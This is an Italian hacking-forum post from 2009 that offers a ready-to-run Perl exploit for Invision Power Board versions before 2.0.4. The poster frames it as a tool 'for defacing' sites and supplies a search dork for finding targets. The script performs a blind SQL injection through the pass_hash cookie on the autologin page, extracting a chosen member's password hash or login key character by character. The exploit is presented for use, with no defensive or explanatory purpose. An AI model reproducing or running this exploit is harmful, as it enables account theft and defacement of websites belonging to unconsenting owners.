Iscriviti   Login

exploit Invision Power Board v1 3

Qui troverete o posterete le vostre Exploit.
Rispondi al messaggio

exploit Invision Power Board v1 3

Messaggiodi ago1980 » 07/11/2009, 1:47

Per Defacing per siti per piattaforma Invision Power Board v1 3
dork: Invision Power Board v1 3 Final
exploit.
Codice: Seleziona tutto
#!/usr/bin/perl



use IO::Socket;



if (@ARGV < 4) { &usage; }



$server = $ARGV[0];

$path = $ARGV[1];

$member_id = $ARGV[2];

$target = $ARGV[3];



$pass = ($target)?('member_login_key'):('password');



$server =~ s!(http:\/\/)!!;



$request = 'http://';

$request .= $server;

$request .= $path;



$s_num = 1;

$|++;

$n = 0;



print "[~] SERVER : $server\r\n";

print "[~] PATH : $path\r\n";

print "[~] MEMBER ID : $member_id\r\n";

print "[~] TARGET : $target";

print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));

print "\r\n";

print "[~] RICERCA PASSWORD ... [|]";



($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;



while(1)

{

if(&found(47,58)==0) { &found(96,122); }

$char = $i;

if ($char=="0")

{

if(length($allchar) > 0){

print qq{\b\b DONE ]



MEMBER ID : $member_id

};

print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));

print $allchar."\r\n";

}

else

{

print "\b\b Nooooo! Niente, nn è vulnerabile.. -.-' ]";

}

exit();

}

else

{

$allchar .= chr($i);

}

$s_num++;

}



sub found($$)

{

my $fmin = $_[0];

my $fmax = $_[1];

if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }



$r = int($fmax - ($fmax-$fmin)/2);

$check = " BETWEEN $r AND $fmax";

if ( &check($check) ) { &found($r,$fmax); }

else { &found($fmin,$r); }

}



sub crack($$)

{

my $cmin = $_[0];

my $cmax = $_[1];

$i = $cmin;

while ($i<$cmax)

{

$crcheck = "=$i";

if ( &check($crcheck) ) { return $i; }

$i++;

}

$i = 0;

return $i;

}



sub check($)

{

$n++;

status();

$ccheck = $_[0];

$pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";

$pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28";

$pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";

$pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

$nmalykh = "%26%231054%3B%26%231081%3B+%26%231088%3B%26%231072%3B%26%231073%3B%26%231086%3B%26%231090%3B%26%231072%3B%26%231077%3B%26%231090%3B%21";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");



printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",

$path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh);



while(<$socket>)

{

if (/Set-Cookie: session_id=0;/) { return 1; }

}



return 0;

}



sub status()

{

$status = $n % 5;

if($status==0){ print "\b\b/]"; }

if($status==1){ print "\b\b-]"; }

if($status==2){ print "\b\b\\]"; }

if($status==3){ print "\b\b|]"; }

}



sub usage()

{

print q(

Invision Power Board v < 2.0.4 SQL injection exploit

----------------------------------------------------

USO:

~~~~~~

exploit.pl [server] [/cartella/] [utente] [target]



[server] - Sito vittima

[/folder/] - Cartella in cui ? installato IPB

[member_id] - Utente da Craccare



targets:

0 - per versioni di IPB 1.x

1 - per versioni di IPB 2.x (Inferiore alla 2.0.4)



Esempio exploit.pl http://xxx.com /IPB/ 1 1

----------------------------------------------------

(c)oded by 1dt.w0lf

RST/GHC , http://rst.void.ru , http://ghc.ru

);

exit();

}


Immagine
ago1980
 
Messaggi: 22
Iscritto il: 15/06/2009, 20:39
Top
Rispondi al messaggio

Torna a EXPLOIT

Chi c’è in linea

Visitano il forum: Nessuno e 1 ospite

cron